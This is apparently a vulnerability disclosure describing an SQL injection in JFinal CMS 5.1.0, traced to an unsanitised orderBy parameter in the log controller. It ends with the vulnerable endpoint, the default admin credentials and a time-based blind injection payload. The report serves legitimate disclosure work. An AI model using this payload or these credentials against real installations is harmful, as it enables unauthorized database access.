Description
SQL injection vulnerability exists in JFinal CMS 5.1.0
Analysis
The vulnerability appears in lines 23-47 of the com.jflyfox.system.log.LogController.java

Here call SQLUtils to query with the following statement:
select count(*) from sys_log t where 1=1
When the length of model.getAttrValues() is not equal to 0, go into the if branch and call the whereEquals() method to concatenate
whereEquals():

The SQL statement after concatenation is as follows:
select count(*) from sys_log t where 1=1 AND t.log_type = 1
Moving on, the orderBy parameter is concatenated to the end of the SQL statement
String orderBy = getBaseForm().getorDerby (); defines the source of the orderBy argument
getBaseForm():

getOrderBy():

The orderBy parameter is the form.OrderColumn parameter passed from the front end
So you can construct payload to exploit this vulnerability
Exploit
Maven Startup Environment
Vulnerability address: /jfinal_cms/system/log/list
Administrator login is required. The default account password is admin:admin123

Injection parameters: form.orderColumn
payload:) AND (SELECT 6361 FROM (SELECT(SLEEP(5)))tAVU)-- woqr

